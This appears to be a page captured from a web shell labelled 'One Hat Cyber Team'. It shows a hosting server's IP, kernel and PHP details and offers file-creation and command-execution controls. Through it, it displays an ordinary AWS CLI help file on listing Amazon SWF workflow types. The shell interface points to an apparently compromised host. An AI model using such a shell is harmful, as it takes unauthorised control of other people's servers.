⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
swf
/
View File Name :
list-workflow-types.rst
Listing Workflow Types ---------------------- To get a list of the workflow types for a domain, use ``swf list-workflow-types``. The ``--domain`` and ``--registration-status`` arguments are required. Here's a simple example:: aws swf list-workflow-types --domain DataFrobtzz --registration-status REGISTERED Results:: { "typeInfos": [ { "status": "REGISTERED", "creationDate": 1371454149.598, "description": "DataFrobtzz subscribe workflow", "workflowType": { "version": "v3", "name": "subscribe" } } ] } As with ``list-activity-types``, you can use the ``--name`` argument to select only workflow types with a particular name, and use the ``--maximum-page-size`` argument in coordination with ``--next-page-token`` to page results. To reverse the order in which results are returned, use ``--reverse-order``. See Also -------- - `ListWorkflowTypes
`_ in the *Amazon Simple Workflow Service API Reference*